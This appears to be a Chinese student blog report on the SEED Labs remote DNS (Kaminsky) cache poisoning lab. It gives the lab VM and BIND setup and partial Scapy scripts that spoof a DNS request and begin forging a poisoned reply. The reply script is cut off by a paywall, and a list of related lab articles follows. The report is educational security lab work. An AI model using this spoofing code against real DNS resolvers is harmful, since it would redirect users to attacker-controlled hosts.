SEEDLab DNS_Remote Attack 实验报告

最新推荐文章于 2024-04-11 22:27:52 发布
原创 最新推荐文章于 2024-04-11 22:27:52 发布 · 3.7k 阅读 · 14 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#网络安全

该博客围绕Kaminsky攻击实验展开,涵盖实验主机配置、环境搭建及各步骤操作。包括本地DNS服务器配置、攻击者虚拟机设置、DNS请求构造与伪造回复等。利用Python和C语言结合构造数据包,通过多次测试提高攻击成功率,最终验证攻击是否成功。

DNS_Remote Attack Seedlab Project

实验主机配置

主机名 IP地址
用户主机 10.0.2.5
本地DNS服务器 10.0.2.7
攻击者 10.0.2.4

实验环境

实验步骤与结果分析

task1 环境安装

由于DHCP为主机自动配置,同时会对etc/resolv.conf文件机进行自动写入覆盖,所以需要进行在用户机的/etc/resolvconf/resolv.conf.d/head 文件中加入 nameserver 10.0.2.7,其中head文件内容会再DHCP自动运行写覆盖etc/resolv.conf文件时,将head文件内容写入etc/resolv.conf文件中,查看两个文件内容,确实相同,结果如下:

10.0.2.7 为设置的本地 DNS 服务器, 当随后测试:

结果表明此时的用户主机的本地dns服务器已经变成了我们设定的10.0.2.7.

task2 Configure the Local DNS Server (the Server VM)

按照实验要求进行配置相关文件,主要对此文件进行能如下配置(10.0.2.4是本实验攻击者IP):

这个配置可以帮助我们在没有购买attacker32.com域的前提下,可以在攻击成功(本地缓存中某个域名example.com的查询将全部指向attacker32.com) 后直接查询设置的攻击者IP:10.0.2.4

task3 Configure the Attacker VM

按照实验要求下载所需要的文件后,对两个文件分别进行如下配置:
attacker32:
attacker.com.zone配置
example文件:

== 上面图片中的问题,目前还没有想明白作用是什么? ==

task4 Testing the Setup

Get the IP address of ns.attacker32.com.

在用户机测试结果:

过程分析:
由于在task2中,我们在本地dns服务器配置了attacker32.com的域名与IP地址的配置对应,使attacker32.com域指向了攻击者主机10.0.2.4,而在攻击者主机10.0.2.4中配置了bind中的attacker.com.zone文件中的IP主机名的映射关系,如图:attacker.com.zone配置
所以理论上我们会查询到的IP地址为10.0.2.19,根据实验结果,相符合,同时使用wireshark抓包,发现过程与分析一致.

Get the IP address of www.example.com

不加@ns.attacker32.com,可以查到官方合法IP地址:

加@ns.attacker32.com,查询失败:

失败的原因如下:
加@ns.attacker32.com,表示去ns.attacker32.com主机查询www.example.com的IP地址,同时由于在上面实验中得到了ns.attacker32.com了,会在本地dns缓存中,本地dns会直接返回对应IP,以及其他字段信息,所以wireshark抓包测试,得到如下结果:

本地dns回复用户具体信息:

同时由于10.0.2.19主机不存在,主机便不断发送ARP请求报文查询对应MAC地址,由于主机不存在,ARP查询报文不断发送,导致超时失败,抓包结果如下:

Attack Task

task 4: Construct DNS request

在攻击者主机运行如下代码:

#!/usr/bin/python
from scapy.all import *
def SendPacket():
	IPpkt=IP(dst='10.0.2.7',src='10.0.2.4') #dst:DNS server IP --- src:attacker IP
	UDPpkt=UDP(dport=53, sport=2222 , chksum=0 )
	Qdsec=DNSQR(qname='www.example.com')
	DNSpkt=DNS(id=0xaaaa, qr=0, qdcount=1,ancount=0,nscount=0,arcount=0,qd=Qdsec)
	Requestpkt=IPpkt/UDPpkt/DNSpkt
	send(Requestpkt)
	
SendPacket()

抓包得到如下:

由于dns请求数据包为伪造,所以当主机收到回复的dns报文后,会产生ICMP端口不可达的回复报文.

task 5: Spoof DNS Replies

在攻击者主机运行如下代码:

#!/usr/bin/python
from scapy.all import *
def ReplyPacket():
	name = 'www.example.com'
	domain = 'example.com' #域名
	ns = 'attacker32.com' #要伪造的目的域名
	Qdsec = DNSQR(qname=name)
	Anssec = DNSRR(rrname=name, type='A', rdata='1.2.3.4', ttl=259200)
	NSsec = DNSRR(rrname=domain, type='NS', rdata=ns, ttl=259200)
	dns = DNS(id=0xAAAA, aa=1, rd=1
最低0.47元/天 解锁文章
(SEED-Lab) DNS_Local Attack Lab
lunan的博客
02-17 6323
(SEED-Lab) DNS_Local Attack Lab 欢迎大家访问我的GitHub博客 https://lunan0320.cn 文章目录(SEED-Lab) DNS_Local Attack Lab一、实验目标二、实验原理三、实验过程Part I Setting Up a Local DNS Server3.1 Task 1: Confifigure the User Machine3.2 Task 2: Set up a Local DNS ServerStep 1: Confifigu
SEEDLab Crypto_PKI 实验报告
C_Ronaldo__的博客
12-23 8047
Crypto_PKI 文章目录Crypto_PKITask1 Becoming a Certificate Authority (CA)ask 2: Creating a Certificate for SEEDPKILab2020.comTask 3: Deploying Certificate in an HTTPS Web Server即:使用openssl自带服务器进行配置Q1:Q2Task 4: Deploying Certificate in an Apache-Based HTTPS Webs
SeedLab8: Remote DNS Attack (Kaminsky Attack) Lab
Rachel_IS的博客
01-19 3127
做完了本地的,来康康远程的 难点就是不能嗅探数据包再进行伪造了,一些字段要通过猜测得到 Task 1 local里配过了,验证一下就行 Task 2 按教程配一条转发 (因为我们自己设置的域名是真实存在的…如果将其作为权威服务器,那么本地DNS服务器会向顶级DNS服务器请求它的IP,然后发送请求,但是这就超出了我们的控制范围 (配一条转发,就是让DNS服务器把对这个权威服务器的请求都发往我们能控制的IP 其他的按教程删改 Task 3 attacker上配两个zone文件(网站上下载模版 (这里要注
SeedLab——DNS Attack Lab
Aft3rGl0w的博客
01-14 2366
然后,本地DNS解析器继续向顶级域名服务器发送查询请求,获取次级域名服务器的地址,以此类推,直到找到负责该域名的DNS服务器。因为查询中的事务ID通常是随机生成的,没有看到查询数据包,攻击者很难知道正确的ID。在 DNS 中,超出域的附加记录是指在 DNS 查询中包含的与请求的域不相关的额外记录。这是通过更改用户机器的解析器配置文件(/etc/resolv.conf)来实现的,将服务器10.9.0.53添加为文件中的第一个nameserver条目,也就是说,这个服务器将被用作主要的DNS服务器。
DNS缓存中毒实验】SEED lab:DNS Remote Attack Lab The Kaminsky Attack
04-11
DNS缓存中毒实验】SEED lab 远程DNS实验代码,The Kaminsky Attack Lab详情操作可见博客 原创代码,码字不易 实测可完成攻击,遇到问题,请及时联系博主。
DNS缓存污染实验】 SEED LAB 远程DNS 缓存中毒--Kaminsky 攻击复现
PsgQ的博客
04-11 4445
SEED LAB 远程DNS 缓存中毒–Kaminsky 攻击复现 0x00 搭建实验环境 使用3台Ubuntu 16.04虚拟机,可到下面的参考链接下载 攻击的服务是BIND9,由于条件限制,这里使用本地的一台虚拟机当作远程DNS解析器,关闭了DNSSEC服务,其中三台机器IP地址,如下图所示: 具体的实验环境搭建过程,可参考:SEED Lab Description 配置User VM: 在用户机 的 /etc/resolvconf/resolv.conf.d/head文件中,加入下面语句,将
Seed lab dns欺骗实验——dns local&dns remote
freedomDA的博客
11-20 9388
文章目录1. 实验2. 实验步骤及结果2.1 DNS _Local2.1.1 环境搭建容器部署DNS配置测试部署2.1.2 The Attack TasksTask 1: Directly Spoofing Response to UserTask 2: DNS Cache Poisoning Attack – Spoofing AnswersTask 3: Spoofing NS RecordsTask 4: Spoofing NS Records for Another DomainTask 5: Sp
Seed lab:Remote DNS Attack
pang241的专栏
05-27 3738
实验环境:服务器ip:192.168.86.139Victim ip: 192.168.86.137Attacker ip:192.168.86.138准备工作: 安装bind9服务器:在bind9官网 下载bind9,在此下载的是bind9.10.4 解压文件tar -xzvf bin9.10.4.tar.gz cd bin9.10.4,并./configure –prefix=/usr/loca
DNS劫持攻击实验
文武老司机的博客
12-24 2436
DNS劫持攻击: 0x01 攻击目的: ​ 劫持靶机的DNS请求,将靶机所有的http请求流量都引导到攻击机搭建的web服务器(shadow website)供靶机访问。 0x02 环境介绍: ​ 攻击机:Kali linux ​ 靶机:ubuntu 20.04 ​ 存在形式:vmware之虚机 ​ 联网方式:NAT ​ IP地址: ​ Gateway:192.168.8.2/24 ​ Kali linux:192.168.8.128/24 ​
Seedlabs】Local DNS Attack Lab
seven49的博客
04-07 4009
目录 一、实验概述 二、实验环境 2.1 测试 DNS 设置 三、实验内容 域名解析 Answers 毒化 2、域名解析 NS 毒化 3、kaminsky 攻击 一、实验概述 DNS (Domain Name System) is the Internet’s phone book; it translates hostnames to IP addresses (and vice versa). This translation is through DNS resolution...
Remote-DNS-Attack:远程DNS缓存攻击__山东大学网络攻防实验三__代码与资源
03-23
远程DNS攻击 远程DNS缓存攻击__山东大学网络攻防实验三__代码与资源,其他分开分别有重叠重叠实验,TCP / IP实验,XSS实验代码
seed缓冲区溢出实验报告1
08-03
这个与实验指导文档中描述的得到 root shell 的现象不一致,会在第 5 节问题及解决方法中提到。图 52. 任务 2:修改 shellcode,在 sh
信息安全 SEED Lab8 Cross-Site Scripting (XSS) Attack Lab
crazyliu的博客
06-12 5821
这个实验主要是利用CSRF攻击来完成一些恶意的操作。由于整个实验过程要用到网站,这里先配置一下。 网站都部署在本地,且用域名访问,所以我们需要现在 /etc/hosts文件中设置域名到 IP 的映射关系。内容如下: 127.0.0.1 www.xsslabelgg.com 网站使用Apache作为服务器,在/etc/apache2/sites-available/000-default.conf配置一下网站主目录,内容如下: <VirtualHost *:80> .
【SEED LABS】The Kaminsky Attack Lab
qq_43599063的博客
08-10 2820
这个实验的目的是让学生获得关于远程DNS缓存中毒攻击(也称为Kaminsky DNS攻击)的第一手经验。DNS(域名系统)是互联网的电话簿;它将主机名转换为IP地址,反之亦然。这种转换是通过DNS解析进行的,它在幕后进行。DNS攻击以各种方式操纵这个解析过程,目的是将用户误导到其他目的地,这通常是恶意的。这个实验室专注于一种特殊的DNS攻击技术,称为DNS缓存中毒攻击。 • DNS and how it works • DNS server setup • DNS cache poisoning attac
Remote DNS Cache Poisoning——山东大学网络攻防实验
我有一颗五角星
05-13 6466
本次实验的目标是让学生获得远程DNS缓存中毒攻击的第一手经验。DNS(Domain Name System)是互联网的电话簿,其将主机名转换为IP地址,反之亦然。这个转换通过DNS解析完成,且对用户是透明的。DNS Pharming攻击以各种方式操纵此解析过程,意图将用户误导到代替的目的地,而这往往是恶意的。本次实验我们聚焦一种特殊的DNS Pharming攻击,叫作DNS缓存中毒攻击。
远程DNS缓存攻击__网络攻防实验三
热门推荐
z轴的博客
12-07 1万+
一、实验描述 DNS(Domain Name System)是一个多层次的分布式数据库系统,其基本功能是完成域名解析,即提供域名和IP 地址之间的映射关系,为Internet 用户提供便利。DNS 服务器只记录本地资源的所有授权主机,若想查询非本地的主机信息, 则要向信息持有者(权威DNS 服务器)发送查询请求。为了避免每次查询都发送请求,DNS 服务器会把权威DNS 服务器返回的查询结果保存...
华中科技大学网络空间安全学院2024年DNS攻击实验
最新发布
qq_52342849的博客
04-11 4627
实验环境中有3个docker容器,分别是user,IP 10.10.27.3,dns,IP 10.10.27.2,attack,IP 10.10.27.4,其中user作为用户进行dns查询,dns作为本地的dns服务器,attack作为攻击者进行远程缓存中毒攻击并且配置攻击者的dns服务。实际攻击过程中需要合适调整发包时延大小。以及在查询www.example.com的过程中由于网络原因,查询结果无法一次性满足实验要求,有可能需要调整查询方式(后续介绍)。
DNS攻击
大草的博客
08-09 3627
先介绍DNS原理,之后我们自行搭建的DNS服务器。 DNS的攻击面不同,我们根据不同的攻击面,给出不同攻击策略以及防御。 其中的重点是Kaminsky DNS远程攻击,攻击利用的是DNS没有验证机制。DNSSEC扩展则提供了安全验证机制。
DNS缓存中毒的攻击的解释
weixin_34082177的博客
03-13 501
DNS缓存漏洞直指我们应用中互联网脆弱的安全系统,而安全性差的根源在于设计缺陷。利用该漏洞轻则可以让用户无法打开网页,重则是网络钓鱼和金融诈骗,给受害者造成巨大损失。 DNS缓存漏洞,了解缓存中毒攻击 缓存中毒攻击者(cachepoisoning)给DNS服务器注入非法网络域名地址,如果服务器接受这个非法地址,那说明其缓存就被攻击了,而且以后响应的域名请求将会受黑客所控。...
DNS与Apache服务器配置实验报告分析
资源摘要信息:"DNS与Apache服务器配置实验报告" DNS (Domain Name System) 域名系统 DNS是互联网的核心服务之一,它负责将易于记忆的域名转换成计算机可以理解的IP地址。DNS是一种分布式数据库系统,它能够存储网络...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值